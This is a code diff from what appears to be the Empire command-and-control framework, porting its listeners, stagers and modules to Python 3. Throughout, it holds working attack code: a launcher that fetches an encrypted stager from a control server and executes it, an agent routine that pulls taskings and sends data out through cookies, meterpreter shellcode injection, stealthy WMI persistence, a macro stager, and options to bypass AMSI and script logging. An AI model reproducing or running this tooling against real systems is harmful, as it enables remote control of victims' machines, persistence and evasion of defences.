476 | 481 | username = proxyCreds.split(':')[0] |
477 | 482 | password = proxyCreds.split(':')[1] |
478 | 483 | launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n" |
479 | launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n" | |
484 | launcherBase += "o = urllib.build_opener(proxy, proxy_auth_handler);\n" | |
485 | ||
486 | # add the RC4 packet to a cookie | |
487 | launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % ( | |
488 | b64RoutingPacket) | |
480 | 489 | else: |
481 | launcherBase += "o = urllib2.build_opener(proxy);\n" | |
490 | launcherBase += "o = urllib.build_opener(proxy);\n" | |
482 | 491 | else: |
483 | launcherBase += "o = urllib2.build_opener();\n" | |
492 | launcherBase += "o = urllib.build_opener();\n" | |
484 | 493 | |
485 | 494 | # install proxy and creds globally, so they can be used with urlopen. |
486 | launcherBase += "urllib2.install_opener(o);\n" | |
495 | launcherBase += "urllib.install_opener(o);\n" | |
487 | 496 | |
488 | 497 | # download the stager and extract the IV |
489 | 498 | |
490 | launcherBase += "a=urllib2.urlopen(req).read();\n" | |
499 | launcherBase += "a=urllib.urlopen(req).read();\n" | |
491 | 500 | launcherBase += "IV=a[0:4];" |
492 | 501 | launcherBase += "data=a[4:];" |
493 | launcherBase += "key=IV+'%s';" % (stagingKey) | |
502 | launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey) | |
494 | 503 | |
495 | 504 | # RC4 decryption |
496 | launcherBase += "S,j,out=range(256),0,[]\n" | |
497 | launcherBase += "for i in range(256):\n" | |
498 | launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n" | |
505 | launcherBase += "S,j,out=list(range(256)),0,[]\n" | |
506 | launcherBase += "for i in list(range(256)):\n" | |
507 | launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n" | |
499 | 508 | launcherBase += " S[i],S[j]=S[j],S[i]\n" |
500 | 509 | launcherBase += "i=j=0\n" |
501 | 510 | launcherBase += "for char in data:\n" |
502 | 511 | launcherBase += " i=(i+1)%256\n" |
503 | 512 | launcherBase += " j=(j+S[i])%256\n" |
504 | 513 | launcherBase += " S[i],S[j]=S[j],S[i]\n" |
505 | launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n" | |
514 | launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n" | |
506 | 515 | launcherBase += "exec(''.join(out))" |
507 | 516 | |
508 | 517 | if encode: |
509 | launchEncoded = base64.b64encode(launcherBase) | |
518 | launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8') | |
510 | 519 | launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % ( |
511 | launchEncoded) | |
520 | launchEncoded.decode('UTF-8')) | |
512 | 521 | return launcher |
513 | 522 | else: |
514 | 523 | return launcherBase |
626 | 635 | 'stage_1': stage1, |
627 | 636 | 'stage_2': stage2 |
628 | 637 | } |
629 | ||
638 | ||
630 | 639 | stager = template.render(template_options) |
631 | 640 | stager = obfuscation.py_minify(stager) |
632 | ||
641 | ||
633 | 642 | # base64 encode the stager and return it |
634 | 643 | if encode: |
635 | 644 | return base64.b64encode(stager) |
636 | 645 | if encrypt: |
637 | 646 | # return an encrypted version of the stager ("normal" staging) |
638 | 647 | RC4IV = os.urandom(4) |
639 | return RC4IV + encryption.rc4(RC4IV + stagingKey, stager) | |
648 | ||
649 | return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8')) | |
640 | 650 | else: |
641 | 651 | # otherwise return the standard stager |
642 | 652 | return stager |
831 | 841 | return updateServers + getTask + sendMessage |
832 | 842 | |
833 | 843 | elif language.lower() == 'python': |
834 | ||
835 | 844 | updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value']) |
836 | 845 | |
837 | 846 | if listenerOptions['Host']['Value'].startswith('https'): |
838 | 847 | updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None" |
839 | print('listeners/http.py: line 851') | |
840 | 848 | sendMessage = """ |
841 | 849 | def send_message(packets=None): |
842 | 850 | # Requests a tasking or posts data to a randomized tasking URI. |
843 | 851 | # If packets == None, the agent GETs a tasking from the control server. |
844 | 852 | # If packets != None, the agent encrypts the passed packets and |
845 | 853 | # POSTs the data to the control server. |
846 | ||
847 | 854 | global missedCheckins |
848 | 855 | global server |
849 | 856 | global headers |
850 | 857 | global taskURIs |
851 | ||
852 | 858 | data = None |
853 | 859 | if packets: |
854 | data = ''.join(packets) | |
860 | data = ''.join(packets.decode('latin-1')) | |
855 | 861 | # aes_encrypt_then_hmac is in stager.py |
856 | 862 | encData = aes_encrypt_then_hmac(key, data) |
857 | 863 | data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData) |
864 | ||
858 | 865 | else: |
859 | 866 | # if we're GETing taskings, then build the routing packet to stuff info a cookie first. |
860 | 867 | # meta TASKING_REQUEST = 4 |
868 | print('getting tasking') | |
861 | 869 | routingPacket = build_routing_packet(stagingKey, sessionID, meta=4) |
862 | b64routingPacket = base64.b64encode(routingPacket) | |
863 | headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket) | |
864 | ||
870 | b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8') | |
871 | headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket) | |
865 | 872 | taskURI = random.sample(taskURIs, 1)[0] |
866 | 873 | requestUri = server + taskURI |
867 | ||
874 | ||
868 | 875 | try: |
869 | data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read() | |
876 | data = (urllib.urlopen(urllib.Request(requestUri, data, headers))).read() | |
870 | 877 | return ('200', data) |
871 | 878 | |
872 | except urllib2.HTTPError as HTTPError: | |
873 | # if the server is reached, but returns an erro (like 404) | |
879 | except urllib.HTTPError as HTTPError: | |
880 | # if the server is reached, but returns an error (like 404) | |
874 | 881 | missedCheckins = missedCheckins + 1 |
875 | 882 | #if signaled for restaging, exit. |
876 | 883 | if HTTPError.code == 401: |
878 | 885 | |
879 | 886 | return (HTTPError.code, '') |
880 | 887 | |
881 | except urllib2.URLError as URLerror: | |
888 | except urllib.URLError as URLerror: | |
882 | 889 | # if the server cannot be reached |
883 | 890 | missedCheckins = missedCheckins + 1 |
884 | 891 | return (URLerror.reason, '') |
885 | ||
886 | 892 | return ('', '') |
887 | 893 | """ |
888 | 894 | return updateServers + sendMessage |
1041 | 1047 | # handle_agent_data() signals that the listener should return the stager.ps1 code |
1042 | 1048 | # step 2 of negotiation -> return stager.ps1 (stage 1) |
1043 | 1049 | listenerName = self.options['Name']['Value'] |
1044 | message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
1050 | message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
1045 | 1051 | signal = json.dumps({ |
1046 | 1052 | 'print': True, |
1047 | 1053 | 'message': message |
1120 | 1126 | for (language, results) in dataResults: |
1121 | 1127 | if isinstance(results, str): |
1122 | 1128 | results = results.encode('UTF-8') |
1129 | ||
1123 | 1130 | if results: |
1124 | 1131 | if results.startswith(b'STAGE2'): |
1125 | 1132 | # TODO: document the exact results structure returned |
715 | 715 | |
716 | 716 | # step 2 of negotiation -> return stager.ps1 (stage 1) |
717 | 717 | listenerName = self.options['Name']['Value'] |
718 | message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
718 | message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP) | |
719 | 719 | signal = json.dumps({ |
720 | 720 | 'print': True, |
721 | 721 | 'message': message |
547 | 547 | # handle_agent_data() signals that the listener should return the stager.ps1 code |
548 | 548 | |
549 | 549 | # step 2 of negotiation -> return stager.ps1 (stage 1) |
550 | dispatcher.send("[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http') | |
550 | dispatcher.send("\n[*] Sending %s stager (stage 1) to %s" % (language, clientIP), sender='listeners/http') | |
551 | 551 | stage = self.generate_stager(language=language, listenerOptions=listenerOptions) |
552 | 552 | return make_response(stage, 200) |
553 | 553 |
2 | 2 | from builtins import str |
3 | 3 | from builtins import object |
4 | 4 | from lib.common import helpers |
5 | ||
6 | 5 | |
7 | 6 | class Listener(object): |
8 | 7 | |
66 | 65 | |
67 | 66 | return True |
68 | 67 | |
69 | ||
70 | def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None): | |
68 | def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None, scriptLogBypass=None, AMSIBypass=None, AMSIBypass2=None): | |
71 | 69 | """ |
72 | 70 | Generate a basic launcher for the specified listener. |
73 | 71 | """ |
57 | 57 | 'Required' : False, |
58 | 58 | 'Value' : '' |
59 | 59 | }, |
60 | 'Payload' : { | |
61 | 'Description' : 'Metasploit payload to inject (reverse_http[s]).', | |
62 | 'Required' : False, | |
63 | 'Value' : 'reverse_https' | |
64 | }, | |
60 | ||
65 | 61 | 'Lhost' : { |
66 | 62 | 'Description' : 'Local host handler for the meterpreter shell.', |
67 | 63 | 'Required' : False, |
74 | 70 | }, |
75 | 71 | 'Shellcode' : { |
76 | 72 | 'Description' : 'Custom shellcode to inject, 0xaa,0xab,... format.', |
77 | 'Required' : False, | |
73 | 'Required' : True, | |
78 | 74 | 'Value' : '' |
79 | 75 | } |
80 | 76 | } |
135 | 131 | for option,values in self.options.items(): |
136 | 132 | if option.lower() != "agent" and option.lower() != "listener": |
137 | 133 | if values['Value'] and values['Value'] != '': |
138 | if option.lower() == "payload": | |
134 | if option.lower() == "payload" : | |
139 | 135 | payload = "windows/meterpreter/" + str(values['Value']) |
140 | 136 | scriptEnd += " -" + str(option) + " " + payload |
141 | 137 | elif option.lower() == "shellcode": |
142 | 138 | # transform the shellcode to the correct format |
143 | sc = ",0".join(values['Value'].split("\\"))[1:] | |
139 | sc = ",0".join(values['Value'].split("\\"))[0:] | |
144 | 140 | scriptEnd += " -" + str(option) + " @(" + sc + ")" |
145 | 141 | else: |
146 | 142 | scriptEnd += " -" + str(option) + " " + str(values['Value']) |
9 | 9 | self.info = { |
10 | 10 | 'Name': 'Invoke-WMI', |
11 | 11 | |
12 | 'Author': ['@mattifestation', '@harmj0y'], | |
12 | 'Author': ['@mattifestation', '@harmj0y', '@jbooz1'], | |
13 | 13 | |
14 | 14 | 'Description': ( |
15 | 15 | 'Persist a stager (or script) using a permanent WMI subscription. This has a difficult detection/removal rating.'), |
224 | 224 | script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, |
225 | 225 | obfuscationCommand=obfuscationCommand) |
226 | 226 | |
227 | return script⏎ | |
227 | return script |
161 | 161 | poshchunks = list(helpers.chunks(poshlauncher, 50)) |
162 | 162 | poshpayload = "Dim Str As String" |
163 | 163 | poshpayload += "\n\t\tstr = \"" + str(poshchunks[0]) |
164 | ||
164 | 165 | for poshchunk in poshchunks[1:]: |
165 | 166 | poshpayload += "\n\t\tstr = str + \"" + str(poshchunk) |
166 | 167 |
156 | 156 | |
157 | 157 | # generate the launcher code |
158 | 158 | launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode, obfuscate=invokeObfuscation, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries, safeChecks=safeChecks, scriptLogBypass=scriptLogBypassBool, AMSIBypass=AMSIBypassBool, AMSIBypass2=AMSIBypass2Bool) |
159 | Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName)))) | |
160 | Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName)))) | |
159 | Str = ''.join(random.choice(string.ascii_letters) for i in range(random.randint(1,len(listenerName)))) | |
160 | Method=''.join(random.choice(string.ascii_letters) for i in range(random.randint(1,len(listenerName)))) | |
161 | 161 | |
162 | 162 | if launcher == "": |
163 | 163 | print(helpers.color("[!] Error in launcher command generation.")) |
0 | 0 | #!/bin/bash |
1 | function install_powershell() { | |
2 | # Deb 10.x | |
3 | if cat /etc/debian_version | grep 10.* ; then | |
4 | sudo apt-get install -y apt-transport-https curl | |
5 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
6 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
1 | 7 | |
8 | mkdir /tmp/pwshtmp | |
9 | (cd /tmp/pwshtmp && \ | |
10 | wget http://http.us.debian.org/debian/pool/main/i/icu/libicu57_57.1-6+deb9u3_amd64.deb && \ | |
11 | wget http://http.us.debian.org/debian/pool/main/u/ust/liblttng-ust0_2.9.0-2+deb9u1_amd64.deb && \ | |
12 | wget http://http.us.debian.org/debian/pool/main/libu/liburcu/liburcu4_0.9.3-1_amd64.deb && \ | |
13 | wget http://http.us.debian.org/debian/pool/main/u/ust/liblttng-ust-ctl2_2.9.0-2+deb9u1_amd64.deb && \ | |
14 | wget http://security.debian.org/debian-security/pool/updates/main/o/openssl1.0/libssl1.0.2_1.0.2t-1~deb9u1_amd64.deb && \ | |
15 | sudo dpkg -i *.deb) | |
16 | rm -rf /tmp/pwshtmp | |
2 | 17 | |
3 | # functions | |
18 | sudo apt-get update | |
19 | sudo apt-get install -y powershell | |
20 | # Deb 9.x | |
21 | elif cat /etc/debian_version | grep 9.* ; then | |
22 | # Install system components | |
23 | sudo apt-get install -y apt-transport-https curl | |
24 | # Import the public repository GPG keys | |
25 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
26 | # Register the Microsoft Product feed | |
27 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
28 | # Update the list of products | |
29 | sudo apt-get update | |
30 | # Install PowerShell | |
31 | sudo apt-get install -y powershell | |
32 | # Deb 8.x | |
33 | elif cat /etc/debian_version | grep 8.* ; then | |
34 | # Install system components | |
35 | sudo apt-get install -y apt-transport-https curl gnupg | |
36 | # Import the public repository GPG keys | |
37 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
38 | # Register the Microsoft Product feed | |
39 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-jessie-prod jessie main" > /etc/apt/sources.list.d/microsoft.list' | |
40 | # Update the list of products | |
41 | sudo apt-get update | |
42 | # Install PowerShell | |
43 | sudo apt-get install -y powershell | |
44 | #Ubuntu | |
45 | elif lsb_release -d | grep -q "Ubuntu"; then | |
46 | # Read Ubuntu version | |
47 | local ubuntu_version=$( grep 'DISTRIB_RELEASE=' /etc/lsb-release | grep -o -E [[:digit:]]+\\.[[:digit:]]+ ) | |
48 | # Install system components | |
49 | sudo apt-get install -y apt-transport-https curl | |
50 | # Import the public repository GPG keys | |
51 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
52 | # Register the Microsoft Ubuntu repository | |
53 | curl https://packages.microsoft.com/config/ubuntu/$ubuntu_version/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list | |
54 | # Update the list of products | |
55 | sudo apt-get update | |
56 | # Install PowerShell | |
57 | sudo apt-get install -y powershell | |
58 | #Kali Linux | |
59 | elif lsb_release -d | grep -q "Kali"; then | |
60 | # Download & Install prerequisites | |
61 | wget http://ftp.us.debian.org/debian/pool/main/i/icu/libicu57_57.1-6+deb9u2_amd64.deb | |
62 | dpkg -i libicu57_57.1-6+deb9u2_amd64.deb | |
63 | apt-get update && apt-get install -y curl gnupg apt-transport-https | |
4 | 64 | |
5 | # Install Powershell on Linux | |
6 | function install_powershell() { | |
7 | if uname | grep -q "Darwin"; then | |
8 | brew install openssl | |
9 | brew install curl --with-openssl | |
10 | brew tap caskroom/cask | |
11 | brew cask install powershell | |
12 | else | |
13 | # Deb 9.x | |
14 | if cat /etc/debian_version | grep 9.* ; then | |
15 | # Install system components | |
16 | sudo apt-get install -y apt-transport-https curl | |
17 | # Import the public repository GPG keys | |
18 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
19 | # Register the Microsoft Product feed | |
20 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
21 | # Update the list of products | |
22 | sudo apt-get update | |
23 | # Install PowerShell | |
24 | sudo apt-get install -y powershell | |
25 | # Deb 8.x | |
26 | elif cat /etc/debian_version | grep 8.* ; then | |
27 | # Install system components | |
28 | sudo apt-get install -y apt-transport-https curl gnupg | |
29 | # Import the public repository GPG keys | |
30 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
31 | # Register the Microsoft Product feed | |
32 | sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-jessie-prod jessie main" > /etc/apt/sources.list.d/microsoft.list' | |
33 | # Update the list of products | |
34 | sudo apt-get update | |
35 | # Install PowerShell | |
36 | sudo apt-get install -y powershell | |
37 | #Ubuntu | |
38 | elif lsb_release -d | grep -q "Ubuntu"; then | |
39 | # Read Ubuntu version | |
40 | local ubuntu_version=$( grep 'DISTRIB_RELEASE=' /etc/lsb-release | grep -o -E [[:digit:]]+\\.[[:digit:]]+ ) | |
41 | # Install system components | |
42 | sudo apt-get install -y apt-transport-https curl | |
43 | # Import the public repository GPG keys | |
44 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
45 | # Register the Microsoft Ubuntu repository | |
46 | curl https://packages.microsoft.com/config/ubuntu/$ubuntu_version/prod.list | sudo tee /etc/apt/sources.list.d/microsoft.list | |
47 | # Update the list of products | |
48 | sudo apt-get update | |
49 | # Install PowerShell | |
50 | sudo apt-get install -y powershell | |
51 | #Kali Linux | |
52 | elif cat /etc/lsb-release | grep -i 'Kali'; then | |
53 | # Install prerequisites | |
54 | apt-get install -y curl gnupg apt-transport-https | |
55 | # Import the public repository GPG keys | |
56 | curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - | |
57 | # Register the Microsoft Product feed | |
58 | sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" > /etc/apt/sources.list.d/microsoft.list' | |
59 | # Update the list of products | |
60 | apt-get update | |
61 | wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu57_57.1-6_amd64.deb | |
62 | dpkg -i libicu57_57.1-6_amd64.deb | |
63 | # Install PowerShell | |
64 | apt-get install -y powershell | |
65 | fi | |
66 | fi | |
67 | if ls /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY; then | |
68 | rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY | |
69 | fi | |
65 | # Add Microsoft public repository key to APT | |
66 | curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add - | |
67 | ||
68 | # Add Microsoft package repository to the source list | |
69 | echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch main" | tee /etc/apt/sources.list.d/powershell.list | |
70 | ||
71 | # Install PowerShell package | |
72 | apt-get update && apt-get install -y powershell | |
73 | fi | |
74 | if ls /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY; then | |
75 | rm /opt/microsoft/powershell/*/DELETE_ME_TO_DISABLE_CONSOLEHOST_TELEMETRY | |
76 | fi | |
70 | 77 | mkdir -p /usr/local/share/powershell/Modules |
71 | 78 | cp -r ../lib/powershell/Invoke-Obfuscation /usr/local/share/powershell/Modules |
72 | 79 | } |
73 | 80 | |
81 | function install_xar() { | |
82 | # xar-1.6.1 has an incompatability with libssl 1.1.x that is patched here | |
83 | # for older OS on libssl 1.0.x, we continue to use 1.6.1 | |
84 | if is_libssl_1_0; then | |
85 | wget https://github.com/BC-SECURITY/xar/archive/xar-1.6.1.tar.gz | |
86 | tar -xvf xar-1.6.1.tar.gz && mv xar-xar-1.6.1/xar/ xar-1.6.1/ | |
87 | else | |
88 | wget https://github.com/BC-SECURITY/xar/archive/xar-1.6.1-patch.tar.gz | |
89 | tar -xvf xar-1.6.1-patch.tar.gz && mv xar-xar-1.6.1-patch/xar/ xar-1.6.1/ | |
90 | fi | |
91 | (cd xar-1.6.1 && ./autogen.sh) | |
92 | (cd xar-1.6.1 && ./configure) | |
93 | (cd xar-1.6.1 && make) | |
94 | (cd xar-1.6.1 && sudo make install) | |
95 | } | |
96 | ||
97 | function install_bomutils() { | |
98 | git clone https://github.com/hogliux/bomutils.git | |
99 | (cd bomutils && make) | |
100 | (cd bomutils && make install) | |
101 | chmod 755 bomutils/build/bin/mkbom && sudo cp bomutils/build/bin/mkbom /usr/local/bin/. | |
102 | } | |
103 | ||
104 | # Because of some dependencies (xar) needing to know which OS has libssl 1.0 | |
105 | # and because some OS are locked into 1.0, we are checking for Ubuntu < 18 and Debian < 9 here. | |
106 | function is_libssl_1_0() { | |
107 | if lsb_release -d | grep -q "Ubuntu"; then | |
108 | if [ $(lsb_release -rs | cut -d "." -f 1) -lt 18 ]; then | |
109 | return | |
110 | fi | |
111 | fi | |
112 | ||
113 | if [ $(cut -d "." -f 1 /etc/debian_version) -lt 9 ]; then | |
114 | return | |
115 | fi | |
116 | ||
117 | false | |
118 | } | |
74 | 119 | |
75 | 120 | # Ask for the administrator password upfront so sudo is no longer required at Installation. |
76 | 121 | sudo -v |
79 | 124 | |
80 | 125 | if [[ "$(pwd)" != *setup ]] |
81 | 126 | then |
82 | cd ./setup | |
127 | cd ./setup | |
83 | 128 | fi |
84 | 129 | |
85 | if uname | grep -q "Darwin"; then | |
86 | Xar_version="xar-1.5.2" | |
87 | install_powershell | |
88 | sudo pip install -r requirements.txt --global-option=build_ext \ | |
89 | --global-option="-L/usr/local/opt/openssl/lib" \ | |
90 | --global-option="-I/usr/local/opt/openssl/include" | |
91 | # In order to build dependencies these should be exproted. | |
92 | export LDFLAGS=-L/usr/local/opt/openssl/lib | |
93 | export CPPFLAGS=-I/usr/local/opt/openssl/include | |
130 | Pip_file="requirements.txt" | |
131 | ||
132 | if lsb_release -d | grep -q "Kali"; then | |
133 | apt-get update | |
134 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk zlib1g-dev libssl1.1 build-essential libssl-dev libxml2-dev zlib1g-dev | |
135 | elif lsb_release -d | grep -q "Ubuntu"; then | |
136 | if is_libssl_1_0; then | |
137 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
138 | Pip_file="requirements_libssl1.0.txt" | |
139 | else | |
140 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
141 | fi | |
142 | sudo apt-get update | |
143 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk $LibSSL_pkgs build-essential | |
94 | 144 | else |
95 | ||
96 | version=$( lsb_release -r | grep -oP "[0-9]+" | head -1 ) | |
97 | if lsb_release -d | grep -q "Fedora"; then | |
98 | Release=Fedora | |
99 | Xar_version="xar-1.5.2" | |
100 | sudo dnf install -y make automake gcc gcc-c++ python-devel m2crypto python-m2ext swig libxml2-devel java-openjdk-headless openssl-devel openssl libffi-devel redhat-rpm-config | |
101 | sudo pip install -r requirements.txt | |
102 | elif lsb_release -d | grep -q "Kali"; then | |
103 | Release=Kali | |
104 | Xar_version="xar-1.6.1" | |
105 | apt-get update | |
106 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk zlib1g-dev libssl1.1 build-essential libssl-dev libxml2-dev zlib1g-dev | |
107 | sudo pip install -r requirements.txt | |
108 | install_powershell | |
109 | elif lsb_release -d | grep -q "Ubuntu"; then | |
110 | Release=Ubuntu | |
111 | sudo apt-get update | |
112 | if [ $(lsb_release -rs | cut -d "." -f 1) -ge 18 ]; then | |
113 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
114 | Pip_file="requirements.txt" | |
115 | Xar_version="xar-1.6.1" | |
116 | else | |
117 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
118 | Pip_file="requirements_libssl1.0.txt" | |
119 | Xar_version="xar-1.5.2" | |
120 | fi | |
121 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk $LibSSL_pkgs build-essential | |
122 | sudo pip install -r $Pip_file | |
123 | install_powershell | |
145 | echo "Unknown distro - Debian/Ubuntu Fallback" | |
146 | if is_libssl_1_0; then | |
147 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
148 | Pip_file="requirements_libssl1.0.txt" | |
124 | 149 | else |
125 | echo "Unknown distro - Debian/Ubuntu Fallback" | |
126 | sudo apt-get update | |
127 | if [ $(cut -d "." -f 1 /etc/debian_version) -ge 9 ]; then | |
128 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
129 | Pip_file="requirements.txt" | |
130 | Xar_version="xar-1.6.1" | |
131 | else | |
132 | LibSSL_pkgs="libssl1.0.0 libssl-dev" | |
133 | Pip_file="requirements_libssl1.0.txt" | |
134 | Xar_version="xar-1.5.2" | |
135 | fi | |
136 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev $LibSSL_pkgs build-essential | |
137 | sudo pip install -r $Pip_file | |
138 | install_powershell | |
150 | LibSSL_pkgs="libssl1.1 libssl-dev" | |
139 | 151 | fi |
152 | sudo apt-get update | |
153 | sudo apt-get install -y make g++ python-dev python-m2crypto swig python-pip libxml2-dev default-jdk libffi-dev $LibSSL_pkgs build-essential | |
140 | 154 | fi |
141 | 155 | |
142 | # Installing xar | |
143 | tar -xvf ../data/misc/$Xar_version.tar.gz | |
144 | (cd $Xar_version && ./configure) | |
145 | (cd $Xar_version && make) | |
146 | (cd $Xar_version && sudo make install) | |
156 | install_xar | |
147 | 157 | |
148 | #Installing bomutils | |
149 | git clone https://github.com/hogliux/bomutils.git | |
150 | (cd bomutils && make) | |
151 | (cd bomutils && make install) | |
158 | install_bomutils | |
152 | 159 | |
153 | # NIT: This fails on OSX. Leaving it only on Linux instances. | |
154 | if uname | grep -q "Linux"; then | |
155 | (cd bomutils && make install) | |
160 | install_powershell | |
161 | ||
162 | if ls /usr/bin/ | grep -q "python3"; then | |
163 | if ! type pip3 > /dev/null; then | |
164 | sudo apt-get --assume-yes install python3-pip | |
165 | fi | |
166 | sudo pip3 install -r $Pip_file | |
156 | 167 | fi |
157 | chmod 755 bomutils/build/bin/mkbom && sudo cp bomutils/build/bin/mkbom /usr/local/bin/. | |
168 | if ls /usr/bin/ | grep -q "python2"; then | |
169 | sudo pip install -r $Pip_file | |
170 | fi | |
158 | 171 | |
159 | 172 | # set up the database schema |
160 | 173 | python ./setup_database.py |